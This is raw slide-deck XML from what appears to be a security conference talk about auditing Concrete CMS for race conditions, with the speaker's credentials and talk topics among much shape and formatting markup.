                <a:latin typeface="sans-serif"/>
                <a:ea typeface="Calibri (MS)"/>
                <a:cs typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>Certifications: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" spc="2">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="sans-serif"/>
              <a:ea typeface="Calibri (MS)"/>
              <a:cs typeface="Calibri (MS)"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2300" spc="2">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="sans-serif"/>
                <a:ea typeface="Calibri (MS)"/>
                <a:cs typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>OSCP/CRTO/CRTL/AWS/Azure/CDP/OSEP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" spc="2">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="sans-serif"/>
              <a:ea typeface="Calibri (MS)"/>
              <a:cs typeface="Calibri (MS)"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="5716"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" spc="2">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="sans-serif"/>
                <a:ea typeface="Calibri (MS)"/>
                <a:cs typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>Conference Speaker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" spc="2">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="sans-serif"/>
              <a:ea typeface="Calibri (MS)"/>
              <a:cs typeface="Calibri (MS)"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2300" spc="2" err="1">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="sans-serif"/>
                <a:ea typeface="Calibri (MS)"/>
                <a:cs typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>BSides</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" spc="2">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="sans-serif"/>
                <a:ea typeface="Calibri (MS)"/>
                <a:cs typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t> Dresden, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" spc="2" err="1">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="sans-serif"/>
                <a:ea typeface="Calibri (MS)"/>
                <a:cs typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>BSides</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" spc="2">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="sans-serif"/>
                <a:ea typeface="Calibri (MS)"/>
                <a:cs typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t> Kent, BlueHatIL , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" spc="2" err="1">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="sans-serif"/>
                <a:ea typeface="Calibri (MS)"/>
                <a:cs typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>Bsides</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" spc="2">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="sans-serif"/>
                <a:ea typeface="Calibri (MS)"/>
                <a:cs typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t> Budapest</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" spc="2">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="sans-serif"/>
              <a:ea typeface="Calibri (MS)"/>
              <a:cs typeface="Calibri (MS)"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="5716"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2300" spc="2">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="sans-serif"/>
              <a:ea typeface="Calibri (MS)"/>
              <a:cs typeface="Calibri (MS)"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2300" spc="2">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="sans-serif"/>
              <a:ea typeface="Calibri (MS)"/>
              <a:cs typeface="Calibri (MS)"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="5716"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2300" spc="2">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="sans-serif"/>
              <a:ea typeface="Calibri (MS)"/>
              <a:cs typeface="Calibri (MS)"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="5716"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2300" spc="2">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="sans-serif"/>
              <a:ea typeface="Calibri (MS)"/>
              <a:cs typeface="Calibri (MS)"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2786"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2500" spc="2">
              <a:solidFill>
                <a:srgbClr val="5F4776"/>
              </a:solidFill>
              <a:latin typeface="Calibri (MS)"/>
              <a:ea typeface="Calibri (MS)"/>
              <a:cs typeface="Calibri (MS)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7098725" y="1017740"/>
            <a:ext cx="3571826" cy="3557736"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6438900" cy="64135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438900" cy="6413500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6438900" h="6413500">
                  <a:moveTo>
                    <a:pt x="3176524" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3146679" y="127"/>
                    <a:pt x="3116961" y="635"/>
                    <a:pt x="3087243" y="1524"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2310130" y="24003"/>
                    <a:pt x="1586103" y="286131"/>
                    <a:pt x="1015619" y="744728"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="376047" y="1258189"/>
                    <a:pt x="0" y="1996059"/>
                    <a:pt x="0" y="2744851"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="3493516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1755521" y="3493516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1755521" y="2744851"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1755521" y="2391791"/>
                    <a:pt x="1918462" y="2070862"/>
                    <a:pt x="2219452" y="1835658"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2489708" y="1624330"/>
                    <a:pt x="2830703" y="1499235"/>
                    <a:pt x="3197098" y="1499235"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3238754" y="1499235"/>
                    <a:pt x="3280664" y="1500886"/>
                    <a:pt x="3322828" y="1504188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4050157" y="1546860"/>
                    <a:pt x="4639437" y="2049653"/>
                    <a:pt x="4689475" y="2670048"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4727067" y="3204845"/>
                    <a:pt x="4351020" y="3707384"/>
                    <a:pt x="3761740" y="3910711"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2896489" y="4199382"/>
                    <a:pt x="2344801" y="4884039"/>
                    <a:pt x="2344801" y="5664835"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2344801" y="6413500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4100195" y="6413500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4100195" y="5664835"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4100195" y="5504307"/>
                    <a:pt x="4225544" y="5365242"/>
                    <a:pt x="4413631" y="5301107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5639562" y="4884801"/>
                    <a:pt x="6436106" y="3871087"/>
                    <a:pt x="6438900" y="2753868"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6438900" y="2753868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6438900" y="2742184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6438900" y="2742184"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6438773" y="2686177"/>
                    <a:pt x="6436614" y="2630043"/>
                    <a:pt x="6432423" y="2573655"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6332220" y="1193927"/>
                    <a:pt x="5040503" y="92329"/>
                    <a:pt x="3423031" y="6731"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3353562" y="2540"/>
                    <a:pt x="3284347" y="381"/>
                    <a:pt x="3215640" y="0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8402054" y="4807962"/>
            <a:ext cx="972213" cy="831313"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="972213" h="831313">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="972214" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="972214" y="831312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8313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017395" y="186080"/>
            <a:ext cx="1595114" cy="3471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30"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="17950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Q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107798" y="6343326"/>
            <a:ext cx="167973" cy="168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68"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="977" spc="53">
                <a:solidFill>
                  <a:srgbClr val="10CFC9"/>
                </a:solidFill>
                <a:latin typeface="Verdana Pro"/>
                <a:ea typeface="Verdana Pro"/>
                <a:cs typeface="Verdana Pro"/>
                <a:sym typeface="Verdana Pro"/>
              </a:rPr>
              <a:t>19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241036" y="1487500"/>
            <a:ext cx="1562414" cy="3846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864"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19902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141213" y="2492702"/>
            <a:ext cx="802300" cy="1697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298"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8784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&amp;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508268" y="800475"/>
            <a:ext cx="3997932" cy="5172150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3997932" h="5172150">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3997932" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3997932" y="5172150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="51721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75640" y="572156"/>
            <a:ext cx="6284163" cy="1372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396"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8140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Let's connect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295262" y="6419786"/>
            <a:ext cx="1794710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114151" y="6414706"/>
            <a:ext cx="156534" cy="221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20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4" t="-277" r="-234" b="-277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87960"/>
            <a:ext cx="12588240" cy="704596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77" b="-2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28625" y="6124575"/>
            <a:ext cx="2324100" cy="733425"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2324100" h="733425">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2324100" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2324100" y="733425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7334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31822" y="4212184"/>
            <a:ext cx="5491045" cy="15414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05"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4432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WHATIS THIS TALK ABOUT? (APPSEC)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191875" y="6414706"/>
            <a:ext cx="78810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77" b="-27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201792" y="783422"/>
            <a:ext cx="7533837" cy="1333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82"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4807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Race condition everywhere! Double Race condition?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191875" y="6414706"/>
            <a:ext cx="77272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75545" y="340728"/>
            <a:ext cx="7428717" cy="9140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570"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5407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About Concrete CMS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77903" y="1497859"/>
            <a:ext cx="78324" cy="477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 spc="-13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77903" y="2117993"/>
            <a:ext cx="78324" cy="477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 spc="-13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77903" y="3357767"/>
            <a:ext cx="78324" cy="477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 spc="-13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7903" y="3977788"/>
            <a:ext cx="78324" cy="477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 spc="-13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7903" y="4597922"/>
            <a:ext cx="78324" cy="477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 spc="-13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7903" y="5217685"/>
            <a:ext cx="78324" cy="477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 spc="-13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06818" y="1492061"/>
            <a:ext cx="3059552" cy="4838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Easy to use CMS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06818" y="2112205"/>
            <a:ext cx="2985890" cy="4838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Written in PHP (&lt;3)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06818" y="3351979"/>
            <a:ext cx="4507373" cy="4838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Used by the US DoD and US army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06818" y="3971990"/>
            <a:ext cx="4403004" cy="4838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HackerOne bug Bounty (no $, just fame)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06818" y="4592134"/>
            <a:ext cx="7803250" cy="4720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This was initially a project sponsored by one of our biggest London clients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06818" y="5211888"/>
            <a:ext cx="5604257" cy="4838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18"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700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After </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1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thisre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700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 search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1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PortlandLabs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700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 became our client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06818" y="2872288"/>
            <a:ext cx="4086176" cy="2892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15"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1725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More than 62K live websites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110908" y="6361115"/>
            <a:ext cx="1955140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191875" y="6414706"/>
            <a:ext cx="78810" cy="221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77903" y="2738671"/>
            <a:ext cx="78324" cy="477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1727" spc="-13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51221" y="221284"/>
            <a:ext cx="11744648" cy="7887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03"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="5400" b="1">
              <a:solidFill>
                <a:srgbClr val="5F4776"/>
              </a:solidFill>
              <a:latin typeface="Calibri (MS) Bold"/>
              <a:ea typeface="Calibri (MS) Bold"/>
              <a:cs typeface="Calibri (MS) Bold"/>
              <a:sym typeface="Calibri (MS) Bold"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2703"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400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–White Box Pentest</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="953853" y="1484679"/>
            <a:ext cx="132416" cy="798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01"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2920" spc="-23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32732" y="1776547"/>
            <a:ext cx="5804735" cy="371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51"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2179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Source code is available, let’s do white box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32732" y="2412094"/>
            <a:ext cx="4962214" cy="5930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2177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Code is PHP, easy to read and audit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32732" y="3162548"/>
            <a:ext cx="7579446" cy="5930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2177" spc="2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Some issues reported previously reported on hackerone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32732" y="3934511"/>
            <a:ext cx="9121663" cy="5930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2177" spc="6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Many issues reported by FORTBRIDGE with plenty of CVEs assigned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061031" y="6362115"/>
            <a:ext cx="2027168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191875" y="6414706"/>
            <a:ext cx="78810" cy="221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6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53853" y="2279779"/>
            <a:ext cx="132416" cy="798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01"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2920" spc="-23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3853" y="3031206"/>
            <a:ext cx="132416" cy="798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01"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2920" spc="-23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53853" y="3786126"/>
            <a:ext cx="132416" cy="798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01"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2920" spc="-23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6181725" y="9525"/>
            <a:ext cx="6010275" cy="4190971"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8013700" cy="55879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013954" cy="5587874"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8013954" h="5587874">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="5553964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135509" y="5547868"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="243459" y="5551678"/>
                    <a:pt x="351536" y="5560441"/>
                    <a:pt x="459740" y="5560441"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="497332" y="5560441"/>
                    <a:pt x="534924" y="5559425"/>
                    <a:pt x="572643" y="5556631"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="651002" y="5551043"/>
                    <a:pt x="729107" y="5548503"/>
                    <a:pt x="807720" y="5547995"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="820674" y="5547868"/>
                    <a:pt x="833628" y="5547868"/>
                    <a:pt x="846582" y="5547868"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1021461" y="5547868"/>
                    <a:pt x="1195959" y="5557012"/>
                    <a:pt x="1370584" y="5565013"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1378077" y="5565394"/>
                    <a:pt x="1385697" y="5565521"/>
                    <a:pt x="1393190" y="5565521"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1453134" y="5565521"/>
                    <a:pt x="1512189" y="5554980"/>
                    <a:pt x="1571625" y="5548122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1610741" y="5543550"/>
                    <a:pt x="1649730" y="5541772"/>
                    <a:pt x="1688719" y="5541772"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1794129" y="5541772"/>
                    <a:pt x="1899031" y="5554726"/>
                    <a:pt x="2004314" y="5560187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2058289" y="5562854"/>
                    <a:pt x="2112137" y="5566283"/>
                    <a:pt x="2165985" y="5566283"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2225675" y="5566283"/>
                    <a:pt x="2285365" y="5562219"/>
                    <a:pt x="2345055" y="5548504"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2380488" y="5540375"/>
                    <a:pt x="2416048" y="5537455"/>
                    <a:pt x="2451862" y="5537455"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2509393" y="5537455"/>
                    <a:pt x="2567305" y="5544948"/>
                    <a:pt x="2624709" y="5550155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2746121" y="5561204"/>
                    <a:pt x="2867406" y="5567935"/>
                    <a:pt x="2988691" y="5567935"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3096641" y="5567935"/>
                    <a:pt x="3204718" y="5562600"/>
                    <a:pt x="3312795" y="5550155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3384550" y="5542535"/>
                    <a:pt x="3456686" y="5538725"/>
                    <a:pt x="3528822" y="5538725"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3624580" y="5538725"/>
                    <a:pt x="3720338" y="5545456"/>
                    <a:pt x="3815207" y="5559045"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3874516" y="5566792"/>
                    <a:pt x="3933571" y="5570221"/>
                    <a:pt x="3992372" y="5570221"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4106164" y="5570221"/>
                    <a:pt x="4219194" y="5557394"/>
                    <a:pt x="4332351" y="5538090"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4358513" y="5533645"/>
                    <a:pt x="4385437" y="5528057"/>
                    <a:pt x="4412234" y="5528057"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4438269" y="5528057"/>
                    <a:pt x="4463923" y="5533264"/>
                    <a:pt x="4488561" y="5549901"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4492244" y="5551552"/>
                    <a:pt x="4496181" y="5552314"/>
                    <a:pt x="4500118" y="5552314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4501642" y="5552314"/>
                    <a:pt x="4503166" y="5552187"/>
                    <a:pt x="4504690" y="5551933"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4527931" y="5551679"/>
                    <a:pt x="4551299" y="5551425"/>
                    <a:pt x="4574540" y="5551425"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4711319" y="5551425"/>
                    <a:pt x="4848098" y="5555997"/>
                    <a:pt x="4984750" y="5555997"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5025390" y="5555997"/>
                    <a:pt x="5066157" y="5555616"/>
                    <a:pt x="5106797" y="5554473"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5116830" y="5554219"/>
                    <a:pt x="5126863" y="5554092"/>
                    <a:pt x="5136896" y="5554092"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5243703" y="5554092"/>
                    <a:pt x="5350129" y="5567300"/>
                    <a:pt x="5456555" y="5575428"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5560314" y="5583301"/>
                    <a:pt x="5663692" y="5587874"/>
                    <a:pt x="5766943" y="5587874"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5946267" y="5587874"/>
                    <a:pt x="6124956" y="5574031"/>
                    <a:pt x="6303264" y="5539995"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6390132" y="5523104"/>
                    <a:pt x="6478143" y="5515738"/>
                    <a:pt x="6566281" y="5514722"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6573648" y="5514595"/>
                    <a:pt x="6580887" y="5514595"/>
                    <a:pt x="6588252" y="5514595"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6669024" y="5514595"/>
                    <a:pt x="6749923" y="5519675"/>
                    <a:pt x="6830314" y="5527041"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7152894" y="5557394"/>
                    <a:pt x="7476363" y="5551425"/>
                    <a:pt x="7799578" y="5557394"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8013954" y="5560823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8013954" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect r="-1421" b="-2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0" y="0"/>
            <a:ext cx="6172200" cy="4181351"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8229600" cy="5575135"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Freeform 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-5969" y="0"/>
              <a:ext cx="8235314" cy="5575173"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8235314" h="5575173">
                  <a:moveTo>
                    <a:pt x="18415" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="19050" y="48641"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13970" y="84709"/>
                    <a:pt x="13081" y="121412"/>
                    <a:pt x="11557" y="157988"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6477" y="291973"/>
                    <a:pt x="11557" y="425831"/>
                    <a:pt x="19177" y="559816"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28448" y="748157"/>
                    <a:pt x="11176" y="936244"/>
                    <a:pt x="19177" y="1124585"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33909" y="1505077"/>
                    <a:pt x="1016" y="1885569"/>
                    <a:pt x="12827" y="2266188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19558" y="2473071"/>
                    <a:pt x="41148" y="2680081"/>
                    <a:pt x="20447" y="2887091"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10287" y="3008630"/>
                    <a:pt x="11684" y="3130931"/>
                    <a:pt x="24765" y="3252343"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40386" y="3411474"/>
                    <a:pt x="44450" y="3571494"/>
                    <a:pt x="37084" y="3731006"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31369" y="3843401"/>
                    <a:pt x="22098" y="3955415"/>
                    <a:pt x="13208" y="4067556"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="4263517"/>
                    <a:pt x="4826" y="4459859"/>
                    <a:pt x="27305" y="4655185"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43434" y="4815078"/>
                    <a:pt x="47625" y="4975352"/>
                    <a:pt x="44958" y="5135753"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="25146" y="5552948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98552" y="5557139"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="139446" y="5564886"/>
                    <a:pt x="179959" y="5568315"/>
                    <a:pt x="220345" y="5568315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="286258" y="5568315"/>
                    <a:pt x="351663" y="5559171"/>
                    <a:pt x="417195" y="5545328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="441579" y="5539613"/>
                    <a:pt x="466471" y="5536819"/>
                    <a:pt x="491236" y="5536819"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="524764" y="5536819"/>
                    <a:pt x="558165" y="5542026"/>
                    <a:pt x="590296" y="5552313"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="600583" y="5555869"/>
                    <a:pt x="611378" y="5557647"/>
                    <a:pt x="622173" y="5557647"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="626491" y="5557647"/>
                    <a:pt x="630936" y="5557393"/>
                    <a:pt x="635254" y="5556758"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="688467" y="5548757"/>
                    <a:pt x="741680" y="5545963"/>
                    <a:pt x="794893" y="5545963"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="889000" y="5545963"/>
                    <a:pt x="982980" y="5554599"/>
                    <a:pt x="1076960" y="5558409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1175385" y="5562346"/>
                    <a:pt x="1273683" y="5566537"/>
                    <a:pt x="1371981" y="5566537"/>
